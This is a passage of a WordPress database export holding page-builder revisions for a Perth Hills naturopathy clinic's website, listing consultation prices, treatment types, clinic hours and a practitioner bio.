Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $130\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 8.15am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-12-06 13:49:56','2021-12-06 05:49:56','',28,'https://verdenaturopathy.com.au/?p=366',0,'revision','',0),(373,1,'2022-01-21 12:20:49','2022-01-21 04:20:49','','Screen Shot 2022-01-21 at 12.20.02 pm','','inherit','open','closed','','screen-shot-2022-01-21-at-12-20-02-pm','','','2022-01-21 12:20:49','2022-01-21 04:20:49','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2022/01/Screen-Shot-2022-01-21-at-12.20.02-pm.png',0,'attachment','image/png',0),(377,1,'2022-01-21 12:23:08','2022-01-21 04:23:08','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" saved_tabs=\"all\" locked=\"off\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2022-01-21 12:23:08','2022-01-21 04:23:08','',188,'https://verdenaturopathy.com.au/?p=377',0,'revision','',0),(375,1,'2022-01-21 12:21:54','2022-01-21 04:21:54','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image title_text=\"Screen Shot 2022-01-21 at 12.20.02 pm\" align=\"center\" 